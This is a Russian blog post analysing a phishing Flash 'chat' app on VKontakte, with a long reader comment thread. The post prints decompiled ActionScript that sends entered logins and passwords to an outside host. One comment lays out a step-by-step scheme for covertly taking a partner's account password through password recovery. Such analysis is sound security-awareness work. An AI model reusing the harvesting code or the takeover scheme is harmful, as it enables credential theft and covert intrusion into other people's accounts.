На vkontakte снова тырят пароли нерадивых пользователей

    Сегодня мне пришло сообщение от одного из друзей, текст его гласил:

    Пpивeтик, Дeниc. Смoтpи кaкoй чaт вкoнтaктe — vkontakte.ru/apps.php?act=s&id=236634&… Зaxoди cкopее, мне oчень понpaвилcя! Кyча впечатлений, бывает пеpеполнен-недоcтупен)))

    Сообщение ушло бы в треш, но последнее предложение насторожило – просто так такое не пишут.
    Решил посмотреть, что за фрукт...

    Перешел по ссылке, увидел обычное флешевое приложение, выглядело оно так:



    После ввода любых данных форма выбрасывает сообщение, что чат перегружен.
    Естественно, стало интересно какие телодвижение при этом оно выполняет, для этого я скачал сам swf-файлик и скормил его Swf Decompiler'у. После разделки оказалось, что пассы и мыла летят POST’ом на http://ckrack.peoplego.ru/save.php:

    1. var my_lv = new LoadVars();
    2. var result_lv = new LoadVars();
    3. my_lv.login_v = _root.login_txt.text;
    4. my_lv.password_v = _root.password_txt.text;
    5. my_lv.sendAndLoad(«ckrack.peoplego.ru/save.php», result_lv, «POST»);

    Нерадивый программер, писавший эту флешку даже не потрудился вставить туда проверку валидности email-адреса. Видимо, был занят написанием малвари, которая в этот самый «чат» людей зазывает.

    P.S.: Пароли воровали, воруют и будут воровать, но удивляет только одно: неужели людей считают настолько тупыми глупыми, делая такие жалкие попытки красть пароли?
    Share post
    AdBlock has stolen the banner, but banners are not teeth — they will be back

    More
    Ads

    Comments 125

      +25
      считают и сколько народа на это попадаются остается загадкой (
        +2
        Школьницы и студентки-простушки — их клиенты.
          +17
          Мужского пола тоже.
            –16
            Ну такие же гламурные мальчики (:
            Ибо нефик пароли легкие ставить и куки не подчищать за собой в кафешках (:
              +9
              Вы зря думаете, что таких мало. Кроме того, применительно к данному топику, обычно просят ввести пароль, а не воруют куки и т.д. И много людей их вводит, то что человек мужчина не означает(и надеюсь не будет), что он с компьютером на «ты». А для того, чтобы не чистить куки в кафешках не обязательно быть гламурным.
              P.S. (:
                –2
                Я немного в контексте данного топика с «нефик пароли легкие ставить и куки не подчищать за собой в кафешках» погорячился. Но в целом как уже говорил «клиентами» воров будет аудитория, для которой интернет как развлечение и не более того.
                  +4
                  А остальные, как правило, скептически относятся к контакту :)
                0
                Вы действительно считаете, что кука с Вашим аккаунтом на хабре кому-то нужна?
                  0
                  При чем тут хабр для начала?
                  0
                  В некоторых инет-кафе просто не успеваешь выйти из того же вконтакта, как доступ блокируется по истечении времени…
                    –4
                    Подчищать булочки за собой в кафешках… Хм… это интересно…
                +1
                попросите предоставить статистику… благо хост знаете ^_^
                  0
                  точно, никогда не надо недооценивать предсказуемость тупизны (с) Большой куш.
                  –1
                  многие считают
                  я вот жду когда начнут «блатные» номера вконтактовские продавать
                  типа 666666 и подобных
                    +4
                    продают и покупают давно. antichat.ru, zloy.org
                      0
                      хм, не знал
                      отстал в этом плане от жизни, так как вышеупомянутые сайты не читаю %)
                      +1
                      таких номеров нет
                      vkontakte.ru/notes.php? id=1&49261
                      +5
                      Я могу поспорить что вот такая жалкая попытка принесла не один десяток паролей.
                        +2
                        не одну сотню, если не тысячу.
                        зависит от распространенности письма с приглашением.
                        • UFO just landed and posted this here
                            +2
                            Владение паролями позволяет, к примеру, развертывать крупные бот-неты по рассылке спама ВКонтакте :)
                              +1
                              Даст не меньше, чем акк ICQ с «некрасивым» номером. Например, можно будет попросить денег взаймы. Или просто «поссориться» с кем-нибудь. Неприятно будет.
                                +4
                                А еще логин — это валидный адрес почты. А пароль часто совпадает.
                                  0
                                  В случае с одним знакомым, пароль не подошел к почте, но подошел к ЖЖ и ICQ.
                                  0
                                  про денег взаймы точно подмечено! думаю, могут легко попросить скинуть денег подружбе на телефон или webmoney/yandex.деньги… так что с этим надо быть очень осторожными! бот-сети не так пугают обычных пользователей, как испорченные отношения со знакомыми!
                                    0
                                    можно продать пароль к аккаунту заинтересованным лицам среди т.н. «Друзей». Например, пароль молодого человека его ревнивой девушке.
                                    • UFO just landed and posted this here
                                      0
                                      так как человек загрузится как друг, можно легко впарить ссылку на обычного трояна. ибо никто не будет подозревать своего друга в связи с вирусяками. такая же тема работает и в icq да везде в принципе, где у тебя налажен контакт с человеком. не часто люди страхуются…
                                  –13
                                  эмм, это жестко-мега-тупой фейк. повестись на такое может только последний …
                                    +10
                                    … почти любой активный пользователь вконтакта.
                                      +5
                                      Как оказалось, даже если он студент третьего курса по специальности Информ. Безопасность :(
                                      • UFO just landed and posted this here
                                      +3
                                      Это даже не фейк — подмены оригинала здесь нет и не намечалось, т.к. этого оригинала попросту нет. Это банальное мошенничество, которое удивляет своей дерзостью и глупостью
                                      –2
                                      ы, оказывается последних «биииииииип-ов» на хабре много =)
                                      • UFO just landed and posted this here
                                          +10
                                          при проходе по этой ссылке FireFox 3 мне сказал
                                          «Reported Attack Site!»
                                            0
                                            домен заблокировали, кстати, на который информация сливается.
                                            +2
                                            И правильно считают :)
                                              +1
                                              > неужели людей считают настолько тупыми глупыми, делая такие жалкие попытки красть
                                              > пароли?

                                              Вконтакте ведь не только гики тусуются, но и люди далекие от IT.
                                              • UFO just landed and posted this here
                                                  +1
                                                  На порядки, я бы сказал
                                                +8
                                                «Не стоит недооценивать предсказуемость тупизны»
                                                • UFO just landed and posted this here
                                                  0
                                                  По-моему, большинство «глупых» пользователей даже не помнят свои пароли: раз ввели и надеются на браузер. Пожалуй, им будет затруднительно набрать его для входа в «чат».
                                                  • UFO just landed and posted this here
                                                      +1
                                                      Год рождения )))
                                                      • UFO just landed and posted this here
                                                        • UFO just landed and posted this here
                                                            +1
                                                            ага:) qwerty
                                                              +1
                                                              ой, я 2 раза не повторяю не повторяю:)))
                                                              0
                                                              ага:) qwerty
                                                                0
                                                                У некоторых что-то семизначное, похожее на номар московского телефона.
                                                          +1
                                                          «Вконтакте» идеальный сервис для подобных обманов, однако.
                                                            0
                                                            очень сильно отключает мозг у основной массы пользователей, превращая в стадо. Знай заполняй формы и ставь галочки. Минимум собственной инициативы. Огромной популярностью пользовались бы кнопки с типичными комментариями «круто», «+1», «приветкагдила» и т.п. Постепенно вообще можно было бы отказаться от текстовых форм ввода :)))) Сервис «Предложения» — типичное подтверждение этому.
                                                            Это не Хабр или жж, где надо что-то думать, когда пишешь :)

                                                            Короче страна непуганных идиотов
                                                              0
                                                              очень сильно отключает мозг у основной массы пользователей, превращая в стадо. Знай заполняй формы и ставь галочки. Минимум собственной инициативы. Огромной популярностью пользовались бы кнопки с типичными комментариями «круто», «+1», «приветкагдила» и т.п. Постепенно вообще можно было бы отказаться от текстовых форм ввода :)))) Сервис «Предложения» — типичное подтверждение этому.
                                                              Это не Хабр или жж, где надо что-то думать, когда пишешь :)

                                                              Короче страна непуганных идиотов
                                                              0
                                                              =) щас тоже напишу такую приложуху и узнаю с кем же переписывается моя подружка =)
                                                              А вдруг она цепляет там порней =)
                                                              На таких блондинок как моя она и расчитана… так что подумайте =)
                                                              • UFO just landed and posted this here
                                                                  –3
                                                                  Открою секрет: vkontakte хранит пароли в plaintext, и при восстановлении просто присылает установленный пароль на мыло.
                                                                  Схема действий: приходишь к ней домой, просишь ее проверить почту (под предлогом, что ты ей посылал офигенную открытку, например), потом отправляешь налить чай. Пока она ходит, восстанавливаешь пароль от аккаунта из другого браузера, пересылаешь пришедшее письмо себе и удаляешь его из ящика. В результате, абсолютно без следов ты получаешь пароль.
                                                                    0
                                                                    Пустить подружку дома за комп посидеть вконтакте — куда проще. Она введёт пароль сама.
                                                                    Можно поставить ей оперу или пунто — а потом потырить профиль/дневник. И ещё тыщаспособов.

                                                                    Мало того, что вы приводите решение не самой благовидной задачи, так ещё и подробно расписываете самое идиотское из возможных.
                                                                    Потырить пароли близкого человека элементарно, а если он не абсолютный ламер — то и сам прекрасно это понимает, и тем не менее не пытается оградиться всеми возможными способами. Удивительно, правда? Доверяет, наверное.
                                                                    0
                                                                    Если есть доступ «к телу», т.е. либо у вас к компу подружки, либо она иногда пользуется вашим — всё куда проще, чем писать приложухи через вконтакт. Так что приложухи пишутся отнюдь не с целью читать, а скорее с целью писать.

                                                                    Другое дело, что с мыслями «а вдруг она цепляет там порней» — лучше не надо. Если чувствуете, что знание (пароля в данном случае) пойдёт вам обоим во вред — держитесь от него подальше.
                                                                    +1
                                                                    поверь, если бы ты начал юзать комп недавно, ты бы все свои пароли отдал бы первому попавшемуся чуваку который стукнулся в асю с ником *Техподдержка*
                                                                      0
                                                                      Ах вот откуда беруться пароли на bugmenot…
                                                                        0
                                                                        На самом деле глупых, вернее нет, неправильно я сказал. Доверчивых и наивных людей очень много в сети, даже можно сказать огромное количество. Сам лично убедился на своей личной статистике. Народ не пользуется антивирусами, запускает екзешники что им под руку попадутся, в общем это было из покон веков и будет еще долго.
                                                                          +1
                                                                          Что уж сказать. Это будет всегда, ибо глупых людей всегда и везде полно.
                                                                          Солидарен с Эйнштейном:
                                                                          «Есть только две бесконечные вещи: Вселенная и глупость. Хотя насчет Вселенной я не вполне уверен.»
                                                                            –1
                                                                            Эйнштейн чрезвычайно гордится тем, что Сам Aco с ним солидарен.
                                                                            0
                                                                            Пароли крали, крадут и будут красть. И наивные люди с одной стороны, и нехорошие с другой никуда не деваются.
                                                                            Я только не совсем понимаю, зачем воровать пароли от аккаунтов социальных сетей (я лично соц.сетями не пользуюсь, поэтому может и не вижу скрытого смысла).
                                                                              0
                                                                              Наверное реклама, рассылка спама, фишинг «друзей» пользователя.
                                                                              +1
                                                                              неужели людей считают настолько тупыми глупыми, делая такие жалкие попытки красть пароли?
                                                                              К сожалению, в структуре vkontakt работает больше 90% (цыфры с потолка, но уверен не меньше) потенциальных жертв фишинга, т.к. эти самые 90% не являются знатоками компьютера, интернета, и опыта работе с «халявой», ведь в большинстве своем людей ловят именно на халяву, даже если человек понимает что это развод, но не попадался еще на него, он всеравно может сделать ошибку…
                                                                                0
                                                                                тоже приходило, но сразу понял, что разводят
                                                                                  0
                                                                                  О чем думают люди, которые находятся у вас в друзьях и копипастят такие ссылки, они сами их проверяют? Мне непонятно.
                                                                                  • UFO just landed and posted this here
                                                                                      +1
                                                                                      Это делают не друзья, а бот, который использует заранее стыренные пароли
                                                                                      0
                                                                                      Приходило подобное сообщения в личку, перешел по ссцылке, еле удрежался ввести мыло и пасс )))
                                                                                        0
                                                                                        А зачем в стороннем чате вводить пароль от Своего мыла? Он же все равно проверить не сможет. странный какой то развод :)
                                                                                          0
                                                                                          ну вообще то не от своего мыло а пороль от оккаунта т.к. при входе указываеться мыло и пасс и здесь так же пост-методом пересылаеться на скрипт который всё эт дело сохраняет а потом будут угоняться аккаунты
                                                                                            0
                                                                                            Угонять их вряд ли кто-то будет, а вот использовать в своих целях — это да.
                                                                                              0
                                                                                              Ну вообще использование в своих целях уже считаеться в какой то степени угоном оО
                                                                                                0
                                                                                                Ссори, не так выразился:
                                                                                                вряд ли будут менять пароли или каким-то другим способом блокировать использование аккаунтов их владельцами.
                                                                                        0
                                                                                        если по нету пошарить можно наткнуться на кучу VKagent'ов.
                                                                                        Если учитывать, что у контакта нету своего мессенджера и это общеизвестно, люди все равно доверяют разработчикам подобного софта и без задних мыслей вводят свои email'ы и пароли.
                                                                                        А уж уровень доверия к самому сайту у пользователей высок, поэтому на подобные фейки попадались и попадаться будут, пока администрации не придумает методы борьбы с подобными вещами.
                                                                                          +3
                                                                                          Недавно было, только закончил переписываться с моей знакомой в Вконтакте и приходит от нее сообщение, примерно следующего содержания: «Привет… бла… бла… бла, помоги мне выиграть Хендай Акцент (причем у нее Опель Корса), отправь сообщение на номер хххх(не помню номер), стОит оно всего 6 рублей». Естественно я сразу же понял что это жесткая напара, автоматом удалил сообщение и забыл про него. Но что сделали большинство ее друзей??? О да, они отравили смс или написали что отправят!!! Не отправили только 3 человека из 47!!! Причем это были не блондинки, а нормальные адектватные люди. У одной девочки за эту смс сняли 500 рублей!!! Мой друг хотел уже отправить, от него я никак не ожидал. Так что социальная инженерия процветает, будте бдительны!!!
                                                                                            0
                                                                                            Нехилый развод… Вот и ответ нафиг нужны пароли от «вконтакте».
                                                                                              0
                                                                                              А Вы разве не видели там недавно волну сообщений на стенках: «пройди по ссылке и досмотри до конца ролик, так в конце такое!!!»? Для такой вот рекламы аккуанты и крадут.
                                                                                                0
                                                                                                Не видел — не зарегестрирован как то… :)
                                                                                                  0
                                                                                                  Ну зато теперь знаете (;
                                                                                              +2
                                                                                              А когда от моего ДРУГА пришло, подобное сообщение, то я ему сразу позвонил, и предупредил, что мол «походу твой акк увели», так вот он сразу зашел, и у всех друзей (а именно ко всем и было разослано такое сообщение) этот «развод» поудалял. Обнаружили быстро, и соответственно никто «не пострадал».

                                                                                              Так вот я к чему, как сказал американский поэт Ричард Эберхарт:

                                                                                              «Не бойся врагов, в худшем случае они могут тебя убить,
                                                                                              не бойся друзей — в худшем случае они могут тебя предать.
                                                                                              Бойся равнодушных — они не убивают и не предают,
                                                                                              но только с их молчаливого согласия существуют на земле предательство и убийство»

                                                                                              Это я про «Естественно я сразу же понял… удалил… и забыл про него».
                                                                                                0
                                                                                                Хм… жестковато, здесь другой случай, но в любом случае спасибо за хорошую цитату.
                                                                                                  0
                                                                                                  Пожалуйста
                                                                                              +2
                                                                                              неужели людей считают настолько тупыми глупыми, делая такие жалкие попытки красть пароли?


                                                                                              Если это работает — тогда что можно сказать про людей? Для кулхацкера, конечно, это «жалкая поптыка». Но человек, теряющий пароль таким образом, может превосходить интеллектом и достижениями и автора «малвари», и автора этого поста, и даже автора данного комментария. Тем не менее, не зная о таких возможностях в силу другой своей специализации, он вводит пароль.
                                                                                                +1
                                                                                                интересно, что потом «хакер» будет делать с этими украденными аккаунтами…
                                                                                                  +1
                                                                                                  рассылать их друзьями еще какую нибудь фишинговую хрень, естественно.
                                                                                                    +1
                                                                                                    мне кажется, в лучшем случае их можно будет развести на платные sms, да «кинь мне денег на телефон, потом верну»
                                                                                                    аудитория ведь школьники/студенты
                                                                                                      +1
                                                                                                      ну это по идее тот же фишинг :)
                                                                                                        0
                                                                                                        В основном распространены сообщения с призывом перейти на сайт с контентом для взрослых.
                                                                                                    +1
                                                                                                    столь жалкие попытки упереть пароль юзеров будут делатся до тех пор, пока вконтакте есть миллионов 10 пользователей-имбецилов, которые на это поведутся.
                                                                                                      0
                                                                                                      да даже если один процент из 10кк поведётся — это уже очень много.
                                                                                                      –1
                                                                                                      а потом эти нерадивые пользователи тоннами шлют сообщения «отправь смс на такой-то номер» да «смотри какой клевый сайт, зайди потом отпишись».
                                                                                                        +5
                                                                                                        Как тема заходит про вконтакте.ру, сразу появляется армия троллей которая минусует всех подряд.
                                                                                                          +1
                                                                                                          отбился от троллей и плюсанул )
                                                                                                          +1
                                                                                                          Offtopic: Кто это тут такой умный проминусовал практически все комменты?
                                                                                                            +2
                                                                                                            Насколько хватило заряда, проплюсовал обратно
                                                                                                              +2
                                                                                                              Это, видать, автор всей затеи с кражей паролей приходил :)
                                                                                                                +4
                                                                                                                щас за армией тролей придет армия лжецов, а потом армия девственников )))
                                                                                                                  +1
                                                                                                                  я тоже…
                                                                                                                  +2
                                                                                                                  И испоганил карму =(
                                                                                                                    +4
                                                                                                                    Немного поправил ситуацию.
                                                                                                                      +3
                                                                                                                      Я тоже помог чем смог :)
                                                                                                                        +2
                                                                                                                        Аналогично.
                                                                                                                        +3
                                                                                                                        Поправил Вам.
                                                                                                                        • UFO just landed and posted this here
                                                                                                                        0
                                                                                                                        helios, отличное решение, респект.
                                                                                                                          +2
                                                                                                                          «P.S.: Пароли воровали, воруют и будут воровать, но удивляет только одно: неужели людей считают настолько тупыми глупыми, делая такие жалкие попытки красть пароли? „

                                                                                                                          Большая часть людей именно такие, особенно блондинки, и настоящие пацаны.
                                                                                                                          Да и если взять что выхлом от такого подхода хотя бы 1 % (хотя по моим прекидкам не меньше 10-30 %), то если умудрить послать всем пользователям контакта, то это будет 110к пользователей.
                                                                                                                          Так что тут скорее работает теория больших чисел, чем тупость или не тупость пользователей
                                                                                                                            0
                                                                                                                            дураки всегда были и всегда будут в нашем мире ) именно на них постоянно и строятся всякие разводы, начиная с банальной кражи пароля от вконтакта или мыла и заканчивая сложными финансовыми пирамидами. люди не хотят думать )

                                                                                                                            есть оч замечательная пословица, к таким разводам — «Доверяй, но проверяй» (с) :)
                                                                                                                              +1
                                                                                                                              После получения абузы хостер довольно оперативно заблокировал аккаунт негодяя, за что отдельное им спасибо=)
                                                                                                                                +2
                                                                                                                                удивляюсь как вобще ктото может клюнуть на такое кидалово))
                                                                                                                                  0
                                                                                                                                  просто люди не задумываясь совершают поступки. так же как бездумно форвадят разный ICQ хлам про вирусы от которых «винт вылетает при первом включении» и «собака в адресе e-mail станет золотой»
                                                                                                                                  0
                                                                                                                                  да уж, интересно с какой целью это надо?
                                                                                                                                  мне кажется с каждым днём всё меньше и меньше народу клюют на такое кидалово
                                                                                                                                    0
                                                                                                                                    один человек клюнул — сотне его друзьям разослались сообщения.
                                                                                                                                    а если клюнет не один человек, а один процент посетителей? ВОт и получается, что эффективность — почти весь вконтакте
                                                                                                                                      0
                                                                                                                                      нет, это понятно… а потом что? куда потом девается эта информация.и какой с неё толк?? не понимаю:)
                                                                                                                                        0
                                                                                                                                        сотням друзей отсылаются сообщения «отошли 10 рублей на номер блабла, помоги пожалуйста». Еще один процент клюнул, сотня другая тысяч рублей злоумышленику капнула.
                                                                                                                                          0
                                                                                                                                          ого…
                                                                                                                                          0
                                                                                                                                          Или банально предлагают пройти по партнерской ссылке, например, со взрослым платным контентом.
                                                                                                                                        0
                                                                                                                                        Может, чтоб потом продать какую-то конфиденциальную инфу… Хотя че там воровать, личные сообщения, френд-лист и фотки :)
                                                                                                                                        0
                                                                                                                                        Нет, это конечно плохо, но просто интересно было бы узнать сколько человек поведётся? А ведь поведуться!)
                                                                                                                                          0
                                                                                                                                          Похоже, вот и сам создатель: vkontakte.ru/profile.php? id=6500198 (судя по whois)
                                                                                                                                            0
                                                                                                                                            «засранцы ближе чем вы ожидали!» ©

                                                                                                                                            Only users with full accounts can post comments. Log in, please.